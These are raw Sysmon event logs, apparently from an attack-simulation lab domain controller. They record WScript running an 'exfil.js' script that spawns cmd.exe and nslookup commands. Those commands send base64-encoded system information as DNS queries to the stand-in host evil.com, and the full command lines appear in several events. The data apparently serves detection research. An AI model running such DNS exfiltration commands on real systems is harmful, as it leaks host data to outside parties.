22542200x8000000000000000209287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.763{00000000-0000-0000-0000-000000000000}7200evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{00000000-0000-0000-0000-000000000000}1152evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.617{00000000-0000-0000-0000-000000000000}6068evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.557{00000000-0000-0000-0000-000000000000}7260evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.493{00000000-0000-0000-0000-000000000000}6676evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.435{00000000-0000-0000-0000-000000000000}5772evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.355{00000000-0000-0000-0000-000000000000}8104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.269{00000000-0000-0000-0000-000000000000}3864evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.174{00000000-0000-0000-0000-000000000000}5592evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.084{00000000-0000-0000-0000-000000000000}5036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.986{00000000-0000-0000-0000-000000000000}8092evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.909{00000000-0000-0000-0000-000000000000}3348evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.829{00000000-0000-0000-0000-000000000000}1488evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000209274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.844{2E1864BB-18EC-629A-CA43-000000005F02}54887632C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-CB43-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.828{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-CB43-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.828{2E1864BB-18EC-629A-C943-000000005F02}39686824C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-CB43-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.843{2E1864BB-18EC-629A-CB43-000000005F02}8132C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-C943-000000005F02}3968C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpmzilc.tmp 2>&1 10341000x8000000000000000209266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.813{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-CA43-000000005F02}5488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.813{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-CA43-000000005F02}5488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.813{2E1864BB-18EC-629A-CA43-000000005F02}54887632C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-C943-000000005F02}3968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.813{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-CA43-000000005F02}5488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.797{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C943-000000005F02}3968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.797{2E1864BB-18E0-629A-6742-000000005F02}39764836C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-C943-000000005F02}3968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.808{2E1864BB-18EC-629A-C943-000000005F02}3968C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpmzilc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.797{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaevh.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.781{2E1864BB-18EC-629A-C743-000000005F02}4152408C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-C843-000000005F02}5196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.777{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C843-000000005F02}5196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.776{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.776{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.776{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.776{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.775{2E1864BB-18EC-629A-C643-000000005F02}64084804C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-C843-000000005F02}5196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.775{2E1864BB-18EC-629A-C843-000000005F02}5196C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-C643-000000005F02}6408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaevh.tmp 2>&1 